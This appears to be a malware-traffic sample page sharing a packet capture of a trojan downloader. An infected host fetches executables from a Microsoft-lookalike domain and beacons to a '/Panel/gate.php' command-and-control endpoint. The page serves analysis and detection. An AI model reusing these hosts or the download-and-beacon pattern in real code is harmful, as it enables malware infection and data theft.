microsoftsup.com POST /Panel/gate.php Malware Trojan Downloader PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap microsoftup
    microsoftsup.com POST /Panel/gate.php Malware Trojan Downloader PCAP File Download Traffic Sample
    Date added: October 23, 2016 6:11 am Added by: admin File size: 18 KB Downloads: 72

2016-10-23 00:47:05.000114 IP 192.168.1.102.58710 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..N..@……..f;.D..V.P……eRP…….GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive


E..(..@….]…f;.D..W.P.e\..1..P….^……..
2016-10-23 00:47:18.618290 IP 192.168.1.102.58711 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8..@….L…f;.D..W.P.e\..1..P…R0..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 339
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

E..(..@….W…f;.D..X.P..b….bP………….
2016-10-23 00:47:20.056174 IP 192.168.1.102.58712 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
E…..@……..f;.D..X.P..b….bP….5..GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Leave a Reply